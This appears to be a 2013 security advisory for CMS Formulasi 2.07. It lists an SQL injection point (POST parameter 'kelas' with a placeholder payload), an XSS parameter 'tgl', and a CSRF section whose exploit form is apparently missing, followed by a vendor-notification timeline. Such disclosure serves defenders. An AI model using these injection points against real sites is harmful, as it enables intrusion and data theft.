################################################################################################################### ______ __ ______ / \ / | / \ /000000 | ______ ______ ______ 00 |____ _____ ____ ______ /000000 | ______ _______ 00 \__00/ / \ / \ / \ 00 \ / \/ \ / \ 00 \__00/ / \ / | 00 \ 000000 |/000000 |000000 |0000000 |000000 0000 | 000000 | 00 \ /000000 |/0000000/ 000000 | / 00 |00 | 00/ / 00 |00 | 00 |00 | 00 | 00 | / 00 | 000000 |00 00 |00 | / \__00 |/0000000 |00 | /0000000 |00 | 00 |00 | 00 | 00 |/0000000 | / \__00 |00000000/ 00 \_____ 00 00/ 00 00 |00 | 00 00 |00 | 00 |00 | 00 | 00 |00 00 | 00 00/ 00 |00 | 000000/ 0000000/ 00/ 0000000/ 00/ 00/ 00/ 00/ 00/ 0000000/ 000000/ 0000000/ 0000000/ ################################################################################################################### # Exploit Title: CMS Formulasi 2.07 Multiple Vulnerability # Date: 30 Sep 2013 # Vendor Homepage: http://formulasi.or.id/ # Software Link: http://cms.formulasi.or.id/p/download-cms-formulasi-terbaru.htm # Version: 2.07 # Tested on: Win 7/Backtrack # CVE : # Exploit Author: Sarahma Security # Author Homepage: http://sarahma.co.id # Author Email: research@sarahma.co.id ======================== SQL Injection ======================== Found on http://localhost/formulasi/kelas-siswa.html parameter : kelas post data : kelas=1{SQL_HERE} ======================== XSS Vulnerability ======================== Found On parameter : tgl http://localhost/cmsformulasi/index.php?p=tglberita&tgl= ======================== CSRF Vulnerability ======================== ---------------------BOF-------------------------------------------------- Formulasi CRSFT Exploit

Formulasi CRSFT Exploit

---------------------EOF-------------------------------------------------- ======================== Solution : ======================== No Update Until This Advisory published ======================== Timeline: ======================== 2013-09-27 Provided details vulnerability to vendor 2013-10-01 Second NotificaTon Vendor 2013-10-04 No Response From Vendor 2013-10-05 Advisory published